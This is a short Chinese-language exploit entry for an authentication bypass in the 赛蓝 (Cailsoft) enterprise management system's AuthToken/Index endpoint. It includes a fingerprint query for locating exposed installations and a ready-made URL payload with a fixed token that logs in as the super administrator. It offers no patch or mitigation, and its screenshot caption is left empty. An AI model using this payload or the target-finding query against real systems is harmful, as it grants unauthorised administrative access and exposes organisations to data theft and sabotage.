S43-1赛蓝-企业管理系统_-PermissionAC

S43-1赛蓝-企业管理系统 -PermissionAC

漏洞描述：

赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞，未授权的远程攻击者可以利用此接口构造token绕过身份认证，使用超级管理员账户登录系统后台，造成信息泄露或者恶意破坏，使系统处于极不安全的状态。

body=“www.cailsoft.com” || body=“赛蓝企业管理系统”

访问url,即可登录后台
payload：

/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

效果图：